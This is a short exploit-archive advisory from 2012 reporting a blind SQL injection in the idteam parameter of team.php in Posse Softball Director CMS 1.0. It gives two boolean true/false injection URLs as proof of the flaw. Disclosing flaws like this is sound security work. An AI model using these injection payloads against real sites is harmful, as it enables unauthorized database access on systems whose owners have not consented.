Posse Softball Director CMS (team.php) Blind SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Posse Softball Director CMS (team.php) Blind SQL Injection Vulnerability
# Published : 2012-01-04
# Author :
# Previous Title : Winn Guestbook v2.4.8c Stored XSS Vulnerability
# Next Title : Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
 ~ Posse Softball Director CMS Blind SQL Injection Vulnerability team.php  ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
[+] Autor: easy laster
[+] Vulnerabilities [Blind SQL Injection ]
[+] Page: www.possesports.com
[+] Language: [ PHP ]
[+] Version: 1.0
[+] Date: 04.01.2012
[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.
  
[+] Vulnerability
  
    team.php?idteam=
      
[+] Exploitable
  
    http://[host]/[path]/team.php?idteam=1+and+1=1--+ #true
    http://[host]/[path]/team.php?idteam=1+and+1=2--+ #false